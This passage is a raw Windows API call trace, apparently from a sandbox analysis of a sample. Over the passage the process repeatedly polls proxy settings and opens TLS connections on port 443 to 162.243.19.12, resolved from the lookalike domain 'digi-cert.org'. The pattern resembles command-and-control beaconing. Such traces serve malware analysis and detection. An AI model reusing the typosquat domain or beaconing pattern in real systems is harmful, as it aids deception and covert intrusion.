	[0340.914] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23c00760 | out: pBuffer=0x2ad23c00760) returned 0x0
	[0340.914] CertDuplicateCertificateContext (pCertContext=0x2ad3bb055d0) returned 0x2ad3bb055d0
	[0340.915] CertDuplicateStore (hCertStore=0x2ad3bad10c0) returned 0x2ad3bad10c0
	[0340.915] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x0) returned 0x2ad3bb055d0
	[0340.915] CertDuplicateCertificateContext (pCertContext=0x2ad3bb055d0) returned 0x2ad3bb055d0
	[0340.915] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x2ad3bb055d0) returned 0x0
	[0340.915] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0340.916] CertFreeCertificateContext (pCertContext=0x2ad3bb055d0) returned 1
	[0340.918] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad22c7b2a0
	[0340.918] CertAddCRLLinkToStore (in: hCertStore=0x2ad22c7b2a0, pCrlContext=0x2ad3bb055d0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0340.919] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb055d0, pTime=0xd7ef71b448, hAdditionalStore=0x2ad22c7b2a0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0340.921] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0340.922] CertDuplicateCertificateContext (pCertContext=0x2ad3bb055d0) returned 0x2ad3bb055d0
	[0340.923] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0340.924] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0340.924] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0340.924] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0340.924] SetLastError (dwErrCode=0x0) 
	[0340.924] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0340.925] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0340.926] CertFreeCertificateContext (pCertContext=0x2ad3bb055d0) returned 1
	[0340.927] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23c03368, MessageSeqNo=0x0 | out: pMessage=0x2ad23c03368) returned 0x0
	[0340.927] CoTaskMemAlloc (cb=0x20) returned 0x2ad3baca2e0
	[0340.927] WSASend (in: s=0x7d0, lpBuffers=0x2ad3baca2e0*=((len=0x3b, buf=0x2ad23c00628*), (len=0xd5, buf=0x2ad23c03170*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3baca2e0*=((len=0x3b, buf=0x2ad23c00628*), (len=0xd5, buf=0x2ad23c03170*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0340.927] CoTaskMemFree (pv=0x2ad3baca2e0) 
	[0340.928] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0340.928] recv (in: s=0x7d0, buf=0x2ad23c03510, len=5, flags=0 | out: buf=0x2ad23c03510*) returned 5
	[0341.423] recv (in: s=0x7d0, buf=0x2ad23c03535, len=1488, flags=0 | out: buf=0x2ad23c03535*) returned 1488
	[0341.424] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23c03c18, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23c03c18, pfQOP=0x0) returned 0x0
	[0341.425] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0341.425] SetEvent (hEvent=0x6b8) returned 1
	[0341.483] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0358.486] CloseHandle (hObject=0x388) returned 1
	[0358.653] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x388) returned 0x0
	[0358.654] RegOpenKeyExW (in: hKey=0x388, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x9d0) returned 0x0
	[0358.654] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe4
	[0358.654] RegNotifyChangeKeyValue (hKey=0x9d0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xe4, fAsynchronous=1) returned 0x0
	[0358.654] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x25c) returned 0x0
	[0358.655] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x270
	[0358.655] RegNotifyChangeKeyValue (hKey=0x25c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x270, fAsynchronous=1) returned 0x0
	[0358.655] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x398) returned 0x0
	[0358.656] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f4
	[0358.656] RegNotifyChangeKeyValue (hKey=0x398, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3f4, fAsynchronous=1) returned 0x0
	[0358.656] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x9cc) returned 1
	[0358.656] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb18140
	[0358.657] WinHttpSetTimeouts (hInternet=0x2ad3bb18140, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0358.657] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0358.672] SetEvent (hEvent=0x6b8) returned 1
	[0358.673] select (in: nfds=0, readfds=0x2ad23c0b640, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23c0b640, writefds=0x0, exceptfds=0x0) returned 1
	[0358.673] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0358.674] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0358.675] shutdown (s=0x7d0, how=2) returned 0
	[0358.677] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0358.677] closesocket (s=0x7d0) returned 0
	[0358.677] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0358.678] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9d8
	[0358.678] WSAConnect (in: s=0x7d0, name=0x2ad23c0cdd8*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0358.785] closesocket (s=0x9d8) returned 0
	[0358.786] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23c09d80, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23c0d660, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23c0d660, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0358.787] FreeContextBuffer (in: pvContextBuffer=0x2ad3badff10 | out: pvContextBuffer=0x2ad3badff10) returned 0x0
	[0358.787] send (in: s=0x7d0, buf=0x2ad23c0d730*, len=333, flags=0 | out: buf=0x2ad23c0d730*) returned 333
	[0358.787] recv (in: s=0x7d0, buf=0x2ad23c0d730, len=5, flags=0 | out: buf=0x2ad23c0d730*) returned 5
	[0358.893] recv (in: s=0x7d0, buf=0x2ad23c0d735, len=49, flags=0 | out: buf=0x2ad23c0d735*) returned 49
	[0358.893] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23c09d80, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c0d970, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23c0d990, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23c0d990, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0358.894] recv (in: s=0x7d0, buf=0x2ad23c0da80, len=5, flags=0 | out: buf=0x2ad23c0da80*) returned 5
	[0358.894] recv (in: s=0x7d0, buf=0x2ad23c0daa5, len=1, flags=0 | out: buf=0x2ad23c0daa5*) returned 1
	[0358.894] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23c09d80, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c0db78, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23c0db98, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23c0db98, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0358.894] recv (in: s=0x7d0, buf=0x2ad23c0dc88, len=5, flags=0 | out: buf=0x2ad23c0dc88*) returned 5
	[0358.894] recv (in: s=0x7d0, buf=0x2ad23c0dcad, len=48, flags=0 | out: buf=0x2ad23c0dcad*) returned 48
	[0358.894] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23c09d80, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c0ddb0, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23c0ddd0, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23c0ddd0, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0358.895] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad2a80 | out: pvContextBuffer=0x2ad3bad2a80) returned 0x0
	[0358.895] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23c0df18 | out: pBuffer=0x2ad23c0df18) returned 0x0
	[0358.895] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23c0df70 | out: pBuffer=0x2ad23c0df70) returned 0x0
	[0358.896] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23c0dfd8 | out: pBuffer=0x2ad23c0dfd8) returned 0x0
	[0358.896] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05ad0) returned 0x2ad3bb05ad0
	[0358.896] CertDuplicateStore (hCertStore=0x2ad3bad10c0) returned 0x2ad3bad10c0
	[0358.896] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x0) returned 0x2ad3bb05ad0
	[0358.897] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05ad0) returned 0x2ad3bb05ad0
	[0358.897] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x2ad3bb05ad0) returned 0x0
	[0358.897] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0358.897] CertFreeCertificateContext (pCertContext=0x2ad3bb05ad0) returned 1
	[0358.899] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad22c7b2a0
	[0358.899] CertAddCRLLinkToStore (in: hCertStore=0x2ad22c7b2a0, pCrlContext=0x2ad3bb05ad0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0358.899] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb05ad0, pTime=0xd7ef71b448, hAdditionalStore=0x2ad22c7b2a0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0358.900] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0358.902] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05ad0) returned 0x2ad3bb05ad0
	[0358.902] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0358.903] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0358.904] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0358.904] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0358.904] SetLastError (dwErrCode=0x0) 
	[0358.904] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0358.904] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0358.905] CertFreeCertificateContext (pCertContext=0x2ad3bb05ad0) returned 1
	[0358.905] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23c10be0, MessageSeqNo=0x0 | out: pMessage=0x2ad23c10be0) returned 0x0
	[0358.905] CoTaskMemAlloc (cb=0x20) returned 0x2ad3baca4c0
	[0358.906] WSASend (in: s=0x7d0, lpBuffers=0x2ad3baca4c0*=((len=0x3b, buf=0x2ad23c0dea0*), (len=0xd5, buf=0x2ad23c109e8*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3baca4c0*=((len=0x3b, buf=0x2ad23c0dea0*), (len=0xd5, buf=0x2ad23c109e8*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0358.906] CoTaskMemFree (pv=0x2ad3baca4c0) 
	[0358.906] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0358.906] recv (in: s=0x7d0, buf=0x2ad23c10d88, len=5, flags=0 | out: buf=0x2ad23c10d88*) returned 5
	[0359.426] recv (in: s=0x7d0, buf=0x2ad23c10dad, len=1488, flags=0 | out: buf=0x2ad23c10dad*) returned 1488
	[0359.426] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23c11490, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23c11490, pfQOP=0x0) returned 0x0
	[0359.426] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0359.426] SetEvent (hEvent=0x6b8) returned 1
	[0359.464] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0375.467] CloseHandle (hObject=0x388) returned 1
	[0375.695] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x388) returned 0x0
	[0375.697] RegOpenKeyExW (in: hKey=0x388, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x9d0) returned 0x0
	[0375.697] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe4
	[0375.697] RegNotifyChangeKeyValue (hKey=0x9d0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xe4, fAsynchronous=1) returned 0x0
	[0375.698] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x25c) returned 0x0
	[0375.698] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x270
	[0375.698] RegNotifyChangeKeyValue (hKey=0x25c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x270, fAsynchronous=1) returned 0x0
	[0375.699] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x398) returned 0x0
	[0375.700] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f4
	[0375.700] RegNotifyChangeKeyValue (hKey=0x398, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3f4, fAsynchronous=1) returned 0x0
	[0375.700] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x9cc) returned 1
	[0375.701] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb19240
	[0375.701] WinHttpSetTimeouts (hInternet=0x2ad3bb19240, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0375.701] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0375.718] SetEvent (hEvent=0x6b8) returned 1
	[0375.718] select (in: nfds=0, readfds=0x2ad23c18e58, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23c18e58, writefds=0x0, exceptfds=0x0) returned 1
	[0375.719] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0375.720] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0375.721] shutdown (s=0x7d0, how=2) returned 0
	[0375.721] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0375.722] closesocket (s=0x7d0) returned 0
	[0375.722] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0375.723] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9d8
	[0375.723] CoTaskMemAlloc (cb=0xf) returned 0x2ad3bb1eec0
	[0375.723] getaddrinfo (in: pNodeName="digi-cert.org", pServiceName=0x0, pHints=0xd7ef71bb20*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xd7ef71bb18 | out: ppResult=0xd7ef71bb18*=0x2ad3bb03e80*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="digi-cert.org", ai_addr=0x2ad3bb1f1e0*(sa_family=2, sin_port=0x0, sin_addr="162.243.19.12"), ai_next=0x0)) returned 0
	[0375.729] CoTaskMemFree (pv=0x2ad3bb1eec0) 
	[0375.729] CoTaskMemFree (pv=0x0) 
	[0375.729] FreeAddrInfoW (pAddrInfo=0x2ad3bb03e80*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="楤楧挭牥⹴牯g", ai_addr=0x2ad3bb1f1e0*(sa_family=2, sin_port=0x0, sin_addr="162.243.19.12"), ai_next=0x0)) 
	[0375.730] WSAConnect (in: s=0x7d0, name=0x2ad23c1a9c0*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0375.836] closesocket (s=0x9d8) returned 0
	[0375.837] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23c175c8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23c1b248, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23c1b248, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0375.838] FreeContextBuffer (in: pvContextBuffer=0x2ad3bae01f0 | out: pvContextBuffer=0x2ad3bae01f0) returned 0x0
	[0375.838] send (in: s=0x7d0, buf=0x2ad23c1b318*, len=333, flags=0 | out: buf=0x2ad23c1b318*) returned 333
	[0375.838] recv (in: s=0x7d0, buf=0x2ad23c1b318, len=5, flags=0 | out: buf=0x2ad23c1b318*) returned 5
	[0375.949] recv (in: s=0x7d0, buf=0x2ad23c1b31d, len=49, flags=0 | out: buf=0x2ad23c1b31d*) returned 49
	[0375.950] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23c175c8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c1b558, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23c1b578, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23c1b578, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0375.950] recv (in: s=0x7d0, buf=0x2ad23c1b668, len=5, flags=0 | out: buf=0x2ad23c1b668*) returned 5
	[0375.950] recv (in: s=0x7d0, buf=0x2ad23c1b68d, len=1, flags=0 | out: buf=0x2ad23c1b68d*) returned 1
	[0375.951] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23c175c8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c1b760, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23c1b780, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23c1b780, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0375.951] recv (in: s=0x7d0, buf=0x2ad23c1b870, len=5, flags=0 | out: buf=0x2ad23c1b870*) returned 5
	[0375.951] recv (in: s=0x7d0, buf=0x2ad23c1b895, len=48, flags=0 | out: buf=0x2ad23c1b895*) returned 48
	[0375.951] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23c175c8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23c1b998, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23c1b9b8, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23c1b9b8, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0375.956] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad2c00 | out: pvContextBuffer=0x2ad3bad2c00) returned 0x0
	[0375.956] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23c1bb00 | out: pBuffer=0x2ad23c1bb00) returned 0x0
	[0375.957] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23c1bb58 | out: pBuffer=0x2ad23c1bb58) returned 0x0
	[0375.957] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23c1bbc0 | out: pBuffer=0x2ad23c1bbc0) returned 0x0
	[0375.957] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05bd0) returned 0x2ad3bb05bd0
	[0375.958] CertDuplicateStore (hCertStore=0x2ad22c7b2a0) returned 0x2ad22c7b2a0
	[0375.958] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x0) returned 0x2ad3bb05bd0
	[0375.958] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05bd0) returned 0x2ad3bb05bd0
	[0375.958] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x2ad3bb05bd0) returned 0x0
	[0375.959] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0375.959] CertFreeCertificateContext (pCertContext=0x2ad3bb05bd0) returned 1
	[0375.961] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad3bad10c0
	[0375.961] CertAddCRLLinkToStore (in: hCertStore=0x2ad3bad10c0, pCrlContext=0x2ad3bb05bd0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0375.961] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb05bd0, pTime=0xd7ef71b448, hAdditionalStore=0x2ad3bad10c0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0375.962] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0375.964] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05bd0) returned 0x2ad3bb05bd0
	[0375.965] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0375.965] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0375.966] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0375.966] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0375.966] SetLastError (dwErrCode=0x0) 
	[0375.966] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0375.967] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0375.967] CertFreeCertificateContext (pCertContext=0x2ad3bb05bd0) returned 1
	[0375.967] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23c1e7c8, MessageSeqNo=0x0 | out: pMessage=0x2ad23c1e7c8) returned 0x0
	[0375.968] CoTaskMemAlloc (cb=0x20) returned 0x2ad3baca040
	[0375.968] WSASend (in: s=0x7d0, lpBuffers=0x2ad3baca040*=((len=0x3b, buf=0x2ad23c1ba88*), (len=0xd5, buf=0x2ad23c1e5d0*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3baca040*=((len=0x3b, buf=0x2ad23c1ba88*), (len=0xd5, buf=0x2ad23c1e5d0*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0375.969] CoTaskMemFree (pv=0x2ad3baca040) 
	[0375.969] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
